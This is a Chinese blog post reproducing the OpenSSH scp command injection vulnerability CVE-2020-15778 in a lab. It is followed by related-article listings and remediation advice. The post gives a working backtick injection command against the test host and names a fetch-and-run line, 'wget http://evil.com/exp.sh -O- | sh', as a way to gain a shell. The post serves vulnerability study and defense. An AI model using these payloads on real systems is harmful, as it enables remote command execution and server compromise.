OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)

最新推荐文章于 2025-06-19 23:21:29 发布
最新推荐文章于 2025-06-19 23:21:29 发布
阅读量7.5k 收藏 11
点赞数 2
CC 4.0 BY-SA版权
分类专栏: InternetSafe 文章标签: 安全 cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hardhard123/article/details/107748304

该文章英文简单易懂,虽翻译之,大佬们轻喷
文章首发公众号:striveben

前言

OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令,不过前提是需要知道ssh的登录密码。

OpenSSh是用于使用SSH(Secure SHell)协议进行加密远程登录的免费开源实现。它可以有效保护登录及数据的安全。

SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。

影响范围

OpenSSH <= 8.3p1

原因

使用scp复制文件到远程服务器时,在scp命令后面跟上文件的路径,具体格式如下:

scp SourceFile user@host:directory/TargetFile

在上述过程中,scp会使用”-t“参数来获取存储传入文件的路径,如下:

scp -t directory/TargetFile

在这里插入图片描述

问题就出在这个地方,也就是"scp.c"文件的989行,如上图所示。这个地方未对传入的文件路径进行检测防护。攻击者可以使用反引号包裹payload然后加上文件名执行scp命令,这时,payload将会发送到远程服务器并执行。

复现

环境信息 靶机kali : 172.16.24.151 利用场景 已知靶机ssh密码为123456

先使用scp命令正常发送文件到靶机:

scp ./111.txt test@172.16.24.151:/home/test/test/111

在这里插入图片描述
上图左边为攻击机,执行scp命令,把"111.txt"发送到右边的靶机上。

接下来执行带有payload的scp命令,payload内容为”在远程服务器上创建一个hack.sh文件“,如下:

scp ./111.txt test@172.16.24.151:'`touch /home/test/test/hack.sh`/home/test/test/112

在这里插入图片描述
上图左边的攻击机执行了”向远程服务器创建hack.sh文件“的payload和发送"111.txt"文件,在图右边靶机中接收到了"hack.sh"和"112(也就是重命名后的111.txt)"。

这个漏洞可能适用于远程服务器禁用了ssh登录,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。那么攻击者可以使用

wget http://evil.com/exp.sh -O- | sh

命令获取网站的shell。

修复建议

等待官方补丁
加强ssh密码或密钥的保护,周期性更换密码或密钥。
使用rsync代替scp

附原文链接

公号回复“加群”,一起交流技术!

CVE-2020-15778 OpenSSH命令注入漏洞
qq_48257021的博客
03-26 1498
OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。SSH协议族可以用来进行远程控制,或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、rcpftp、rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
热门推荐
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
OpenSSH 命令注入漏洞(CVE-2020-15778)
FishSaid的博客
12-11 3082
openssh中包含scp命令,用于远程复制文件,其使用方式与openssh登录的方式是相同的。 ssh远程登录安装了openssh的linux系统 ssh 远程机器用户名@ip地址 scp远程复制文件 scp 本地文件 远程机器用户名@ip地址:'文件路径+文件名称' 之后都是输入用户密码完成操作。 漏洞发生于scp命令:后输入的文件路径中,在’'中加入``,这两个符号之中的文本会被远程主机在运行scp -t 时当作命令执行 例如: scp 本地文件 远程机器用户名@ip地址:'`touch t
cve2025-24813复现和分析(含靶场搭建)
最新发布
weixin_48152280的博客
06-19 1091
cve2025-24813复现和分析(含靶场搭建)
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 3700
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
OpenSSH 操作系统命令注入漏洞CVE-2020-15778
茉清语
08-09 298
OpenSSH 操作系统命令注入漏洞
修复低版本漏洞OpenSSH 操作系统命令注入漏洞CVE-2020-15778
qq_18846873的博客
12-18 1310
本次描述的修复方式只适用于应付检查,并不是真正修复,如果真正修复,需要将OpenSSH组件升级到官方最新版本。 查看当前的版本:ssh -V 把脚本中的7.4换成上面查询的结果 #!/bin/bash os=`cat /etc/os-release|grep ID|grep -v VERSION_ID` ssh_status=`systemctl status sshd` if [[ $os =~ "centos" ]];then ssh=`strings /usr/bin/ssh|gre
OpenSSH命令注入漏洞(CVE-2020-15778)
guoshaoliang789的专栏
03-06 759
OpenSSH命令注入漏洞(CVE-2020-15778)
OpenSSH命令注入漏洞CVE-2020-15778
weixin_41182861的博客
09-25 5235
漏洞简述 OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。 实际环境汇中的利用场景: 对于用户来说,ssh被阻止,但在authorized_keys文件中的命令选项允许使用scp的情况下,可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到ssh的用户密码,但是不允许ssh连接,或者IP连接受限等情况下,可以尝试此漏洞进行利用。 涉及版本:OpenS
【Linux】OpenSSH 命令注入漏洞(CVE-2020-15778)(iptables屏蔽22端口方式)
实施工程师从入门到放弃
11-29 2871
操作过程中要边操作边验证,切记不要关闭已打开的窗口,保持开启,即使操作错误了,这个窗口也不会自动断开,还可以自行修复,否则就无法连接,直接找人吧。这就没辙了,只能限制服务器端口访问了,但是服务器不是我方管的,只能审慎执行命令,不然登不上去了还得找别人给帮忙处理。这个命令就是删除iptables -L列出的命令,后面数字为L列出来的顺序,建议从下往上删,绿盟扫出来的漏洞,但是禁用scp漏洞复扫还是有这个漏洞,查询版本SSH版本也是没问题的。验证1022端口是否可连接,可以的话回到上一步。
[应用漏洞]OpenSSH scp命令注入漏洞(CVE-2020-15778)
不忘初心,护天下安全!
08-03 1万+
一、漏洞简介 该漏洞发生于OpenSSH <= 8.3p1 系统,即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 利用条件:知道目标的ssh密码 二、漏洞原理 scp是 secure copy的缩写, scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令。linux的scp命令可以在linux服务器之间复制文件和目录。 scp格.
OpenSSH_8.3-命令注入漏洞攻击与修复(CVE-2020-15778)
sinat_42508733的博客
05-27 1521
OpenSSH_8.3及如下-命令注入漏洞攻击与修复 漏洞CVE-2020-15778 2020年6月9日发现漏洞2020年7月18日公开漏洞。web 攻击原理 使用SCP中远程功能进行命令注入。shell 漏洞复现要求 OpenSSH版本 =<8.3p1安全 ssh链接密码bash 攻击环境 攻击方:kali:192.168.0.130 服务器 靶机: CentOS7:192.168.0.187 ssh 攻击测试 kali:tcp 上传任意文件到靶机上,文件容许为空,由于上传的文件不是主角。而是
发现安全漏洞CVE-2020-15778——深入OpenSSHSCP命令注入风险
gitblog_00068的博客
06-15 774
发现安全漏洞CVE-2020-15778——深入OpenSSHSCP命令注入风险 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全的广阔领域中,发现并修复漏洞是维护数据与系统安全的关键一环。今天,我们将聚焦于一个曾引起广泛关注的安全事件——CVE-2020-15778。这是一起由安全研究者Chinmay Pandya揭示的关于OpenSSH 8.3p1中S...
OpenSSH 操作系统命令注入漏洞CVE-2020-15778
03-29
<think>嗯,用户想了解OpenSSHCVE-2020-15778漏洞详情和修复方案。首先,我需要整理这个漏洞的基本信息。根据引用[2]和[3],这个漏洞属于命令注入类型,影响的是scp命令。攻击者可以通过构造恶意文件名,在远程服务器上执行任意命令。要注意的是,即使SSH登录被禁用,只要允许scp传文件,就可能被利用。 接下来,影响版本方面,引用提到是OpenSSH 8.3p1及之前的版本。用户可能需要确认自己使用的版本是否在这个范围内。修复方法的话,引用[4]和[5]指出需要升级到8.8p1版本,并重新编译安装。同时,临时缓解措施包括禁用scp或限制使用反引号。 用户可能还关心漏洞复现的过程,但根据安全建议,详细步骤可能不宜展开,所以需要提醒用户不要尝试复现以免风险。另外,安全更新方面,除了升级OpenSSH,还要更新依赖的OpenSSL库,确保兼容性。 在回答时要注意结构清晰,分点说明漏洞详情、影响版本、修复方案、安全建议等。同时,引用对应的来源,比如引用[1]、[2]、[3]等,确保信息的准确性。还要生成相关问题,帮助用户进一步理解,比如漏洞原理、检测方法、历史案例等。</think>### OpenSSH CVE-2020-15778 漏洞详情及修复方案 #### 漏洞详情 1. **漏洞类型**:命令注入漏洞,攻击者可通过构造恶意文件名在远程服务器执行任意命令[^2][^3]。 2. **影响组件**:OpenSSH 的 `scp` 命令(用于安全文件传输)。 3. **漏洞原理**:`scp` 在处理文件名时未对反引号(` `)进行过滤,导致命令注入。例如,攻击者构造如 `file`\`command\` 的文件名,远程服务器执行时会解析 `command` 并执行[^5]。 4. **利用条件**: - 目标服务器允许使用 `scp` 传输文件。 - 远程服务器支持反引号语法(大多数 Linux 系统默认支持)。 #### 影响版本 - OpenSSH 8.3p1 及之前版本[^3]。 - 常见受影响系统:CentOS、Ubuntu、Debian 等使用旧版 OpenSSH 的 Linux 发行版。 #### 修复方案 1. **官方补丁**: - 升级至 OpenSSH 8.8p1 或更高版本,该版本修复了 `scp` 命令注入漏洞[^4]。 - **操作步骤**: ```bash # 下载并编译新版本 wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.8p1.tar.gz tar -xvf openssh-8.8p1.tar.gz cd openssh-8.8p1 ./configure make && make install ``` 需同时更新依赖库(如 OpenSSL)。 2. **临时缓解措施**: - 禁用 `scp`,改用 `sftp` 或 `rsync` 替代[^1]。 - 限制服务器对反引号的使用(需修改系统配置,可能影响部分功能)。 #### 安全建议 - **验证与监控**:检查服务器是否运行受影响版本,使用命令 `ssh -V` 查看 OpenSSH 版本。 - **最小权限原则**:限制用户对 `scp` 的访问权限。 - **日志审计**:监控服务器日志中异常 `scp` 操作记录。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

StriveBen

写字不易,给点动力吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值